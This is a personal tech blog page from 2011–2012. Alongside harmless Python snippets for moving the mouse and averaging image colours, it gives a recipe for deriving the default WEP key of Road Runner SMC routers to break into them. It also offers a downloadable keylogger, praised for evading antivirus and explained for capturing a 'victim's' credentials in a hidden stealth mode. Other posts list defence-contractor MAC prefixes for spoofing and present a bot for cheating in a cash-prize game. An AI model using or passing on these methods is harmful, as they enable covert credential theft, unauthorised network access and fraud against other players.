import time
import win32api
MOUSE_SPEED = .4 #seconds
def mouse_glide_to(x,y):
"""Smooth glides mouse from current position to point x,y with default timing and speed"""
x1,y1 = win32api.GetCursorPos()
smooth_glide_mouse(x1,y1, x, y, MOUSE_SPEED)
def smooth_glide_mouse(x1,y1,x2,y2, t, intervals):
"""Smoothly glides mouse from x1,y1, to x2,y2 in time t using intervals amount of intervals"""
distance_x = x2-x1
distance_y = y2-y1
for n in range(0, intervals+1):
move_mouse(x1 + n * (distance_x/intervals), y1 + n * (distance_y/intervals))
time.sleep(t*1.0/intervals)
def move_mouse(x, y):
win32api.SetCursorPos((x,y))
mouse_glide_to(x,y) will move the cursor from its current position to point (x,y) in MOUSE_SPEED seconds. It works perfectly!
Monday, June 25, 2012
Python: Glide, instead of move, mouse cursor from one point to another
I couldn't find a function in pywin32 to smoothly glide a pointer from one point to another, instead of simply "moving" the cursor by making it jump from its current position to a given position. I needed a way to make the mouse sort of "glide" from point A to point B at a seemingly natural pace, so here's my solution:
Saturday, June 23, 2012
Road Runner (SMC Networks) routers - practically NO security
Upon registering for Time Warner's Road Runner internet service, customers are offered a router manufactured by SMC Networks. The router ships with WEP encryption enabled by default, using a 128-bit key based on its MAC address. While WEP encryption is already the most insecure form of wireless encryption out there, SMC Networks amplifies this weakness further by not generating a random WEP key; something which a home user almost never changes unless forced to do so during first time installation, whether it is because he or she is ignorant about the risks of a vulnerable network, or because he or she simply doesn't know how to or care enough to change it. While a randomly generated WEP key can be defeated just as easily as any other, the default encryption key for these routers is trivial and can be determined just by spotting it in a regular AP (Access Point) scan of the area.
The encryption key can be discovered in seconds, without the need for conventional wireless cracking tools such as the aircrack-ng suite. These routers effectively have no security whatsoever, as even the most tech-challenged of computer users can break into them. From there, the users of the network are vulnerable to all kinds of harm, ranging from innocent piggy-backing to malware and identity theft.
Here's how:
In this example, let's assume we see a router whose SSID is '4B5F' and whose wireless MAC address is 00:26:F3:73:4B:52. The WEP key is generated in this format:
[first 10 characters of MAC] + [last two characters of SSID] + 14 0's
Following this format, we take the first 10 hex digits (or first 5 octets) of the MAC address, which we can easily find when performing a normal everyday wireless scan in Windows or OS X: "00:26:F3:73:4B", append the last two digits of the SSID: "5F", and tack on 14 0's to form the router's 128-bit encryption key:
00:26:F3:73:4B:5F:00:00:00:00:00:00:00
Knowing this, any joe-shmo can "hack" into an Road Runner SMC-Networks router with just a smartphone and optionally a pen and paper. I would highly recommend that either SMC Networks or Road Runner move on to WPA2 encryption in their new routers and attempt to update these routers to use WPA2. New Verizon FiOS Actiontec routers come factory default with WPA2 enabled with a randomly generated 32 character string and WPS disabled; they could learn something from Verizon!
EDIT: Apparently, the insecurity of these routers was already covered in an article from 2009; it's sad to see nothing has been done about it since then!
"However, the Time Warner devices come pre-configured and locked, with URL blocking being the only feature available to the customer through the web administration interface."According to the article, the router's web administration is locked and the home user cannot change the encryption scheme nor the encryption key, even if he or she wanted to. This is definitely a huge issue.
Python: Calculating the average color of an area of an image (PIL)
Here's a snippet of code I whipped up in Python to calculate the the average color of a square shaped area of an image. I used the Python Imaging Library (PIL) to load the image, so be sure to have it available if you're using this.
import Image
def get_average_color((x,y), n, image):
""" Returns a 3-tuple containing the RGB value of the average color of the
given square bounded area of length = n whose origin (top left corner)
is (x, y) in the given image"""
r, g, b = 0, 0, 0
count = 0
for s in range(x, x+n+1):
for t in range(y, y+n+1):
pixlr, pixlg, pixlb = image[s, t]
r += pixlr
g += pixlg
b += pixlb
count += 1
return ((r/count), (g/count), (b/count))
image = Image.open('test.png').load()
r, g, b = get_average_color((24,290), 50, image)
print r,g,b
This is great for detecting the color of an area of an animated and constantly changing game screen, where finding the color of a single pixel may not be accurate enough for your needs.
Saturday, March 31, 2012
Simple Keylogger in VB .NET
This free, easy to use, and open source application does not raise any flags with popular anti-viruses as of right now, according to this report from VirusTotal, a service that scans a file through 40+ popular anti-virus products.
To use, simply:
- Check the "Write to file?" checkbox and select a path (or use the default path), then click Open.
- Click the Start button to start keylogging.
- Press the key combination CTRL+SHIFT+S (all at once) to conceal the window. ("stealth" mode)
- Press some keys, or wait for the victim to type something.
- Whenever you want, hit CTRL+SHIFT+S again to bring the window back and view the log. Exit the application or hit End to make it write the log to the log file you specified.
- Open the logfile to view keystrokes. This file is hidden, so make sure you have Show hidden files enabled in Windows Explorer to find it.
 |
| Victim logs in |
 |
| credentials captured ;) |
If you would like to improve or modify this application, feel free to use the provided source code! It requires the .NET Framework 4.0 redistributable package to be installed in order to run.
Binary (.exe): Download
.NET 4.0 redistributable package: Download
Source: GitHub repo
SomewhatSecureChat - Chat with another computer on your network!
This free, simple chat application that will allow you to securely chat with another computer on your LAN (on your local network, though it could work over the internet but not without some changes to account for NAT - like port fowarding). It was written in VB .NET, so you'll need the .NET framework installed in order to use it. Click here to download it.
Both parties will need to have this application running (and listening) in order to chat. Simply agree on a mutual password and record your friend's listening port number and IP address, and you'll be chatting in no time! Somewhat Secure Chat is only for Windows. This easy to use application is free and open-source; feel free to improve and distribute this program!
Binary (.exe): Download
Required .NET framework 4.0 installer: Download
Source: GitHub Repo
Wednesday, October 19, 2011
Badass OUIs to use when spoofing your MAC address
When spoofing MAC addresses, I like to use OUIs from major defense companies to troll anyone that snoops around (and bothers to look it up). Here's my list of awesome OUIs:
00-1A-11 (hex) Google Inc.
001A11 (base 16) Google Inc.
1600 Amphitheater Parkway
Mountain View CA 94043
UNITED STATES
00-00-8F (hex) Raytheon
00008F (base 16) Raytheon
M/S 1-1-1119
1001 Boston Post Rd
Marlboro MA 01752
UNITED STATES
00-0B-F3 (hex) BAE SYSTEMS
000BF3 (base 16) BAE SYSTEMS
6500 Tracor Lane
Austin Texas 78725
UNITED STATES
00-E0-AF (hex) GENERAL DYNAMICS INFORMATION SYSTEMS
00E0AF (base 16) GENERAL DYNAMICS INFORMATION SYSTEMS
COMPUTING DEVICES, LTD.
3190 FAIRVIEW PA
FALLS CHURCH VA 22042-4523
UNITED STATES
00-A0-21 (hex) General Dynamics
00A021 (base 16) General Dynamics
Communication Systems
77A Street
Needham Heights MA 02494-2892
UNITED STATES
00-26-89 (hex) General Dynamics Robotic Systems
002689 (base 16) General Dynamics Robotic Systems
1231 Tech Court
Westminster MD 21157
UNITED STATES
00-19-8A (hex) Northrop Grumman Systems Corp.
00198A (base 16) Northrop Grumman Systems Corp.
7055 Troy Hill Drive
Elkridge Maryland 21075
UNITED STATES
00-40-BE (hex) BOEING DEFENSE & SPACE
0040BE (base 16) BOEING DEFENSE & SPACE
P.O. BOX 3999
MAIL STOP 88-12
SEATTLE WA 98124-2499
UNITED STATES
60-8D-17 (hex) Sentrus Government Systems Division, Inc
608D17 (base 16) Sentrus Government Systems Division, Inc
141 Chesterfield Industrial Blvd
Chesterfield MO 63005-1219
UNITED STATES
00-07-EF (hex) Lockheed Martin Tactical Systems
0007EF (base 16) Lockheed Martin Tactical Systems
3333 Pilot Knob Road
Eagan MN 55121
UNITED STATES
00-08-55 (hex) NASA-Goddard Space Flight Center
000855 (base 16) NASA-Goddard Space Flight Center
Code 561
Greenbelt MD 20771
UNITED STATES
00-0E-96 (hex) Cubic Defense Applications, Inc.
000E96 (base 16) Cubic Defense Applications, Inc.
P.O. Box 85587
9333 Balboa Avenue
San Diego CA 92186-5587
UNITED STATES
00-14-8D (hex) Cubic Defense Simulation Systems
00148D (base 16) Cubic Defense Simulation Systems
2001 W. Oakridge Road
Orlando FL 32809
UNITED STATES
00-1F-0D (hex) L3 Communications - Telemetry West
001F0D (base 16) L3 Communications - Telemetry West
9020 Balboa Ave
San Diego CA 92123
UNITED STATES
EC-5C-69 (hex) MITSUBISHI HEAVY INDUSTRIES MECHATRONICS
SYSTEMS,LTD.
EC5C69 (base 16) MITSUBISHI HEAVY INDUSTRIES MECHATRONICS
SYSTEMS,LTD.
1-16,5-CHOME,KOMATSU-DORI,
KOBE HYOGO 652-0865
JAPAN
00-00-AE (hex) DASSAULT ELECTRONIQUE
0000AE (base 16) DASSAULT ELECTRONIQUE
55, QUAI MARCEL DASSAULT
92214 ST CLOUD
FRANCE
FRANCE
00-00-AF (hex) NUCLEAR DATA INSTRUMENTATION
0000AF (base 16) NUCLEAR DATA INSTRUMENTATION
GOLF & MEACHAM ROADS
SCHAUMBERG IL 60196
UNITED STATES
Monday, October 10, 2011
WorldWinner Big Money Bot written in Python
 |
| What WW used to look like before GSN bought them. |
I generally scored between 60,000-120,000 points on WorldWinner's Big Money compete-for-cash game, which, to me, was pretty good. That was until I decided to looked up some strategies for improving my skill in BM and instead stumbled upon some YouTube videos of players scoring upwards of 350,000 points. My highest score was 137,582, and the highest I've ever seen in my experience was around 180k. You can imagine I was pretty shocked that a score higher than 200,000 was even possible, let alone achievable without cheating.
I then realized how much I suck at this game. Well, what do you do when you can't beat a game? Try, try again? Practice? Nope. You cheat.
A simple Google search for "worldwinner big money bot" led me to one of those shady infomercial style sites with obviously fake and cheesy testimonials. The product's slogan ended with "MAKE MORE MONEY THAN YOU COULD EVER IMAGINE!!!" Riiiiiight.
Other than that shady site, I couldn't find any mention elsewhere of a bot for Big Money. I decided to make my own.
It works, but it doesn't strategize, ponder, or think ahead yet; so it will usually end the game with a score between 60k - 120k. I wrote this a while ago and I'm too busy at the moment to implement this feature. If anybody would like to improve upon this, feel free. Be warned, however: I didn't think I'd be sharing this so it's poorly commented.
To start, simply download the script here. It was written for the latest version of Python 2, but any version > 2.5 should work fine IIRC. It requires the Python Imaging Library (PIL) and Python for Windows Extensions (pywin32).
Before you can run it, you'll need to modify the script to set some variables. You'll need to change variables 'xbeg' and 'ybeg' to fit your resolution and browser. You can take a screenshot and measure the distance in MS Paint. Use the picture below as a guide.
Here's a video of the bot in action:
Subscribe to:
Posts (Atom)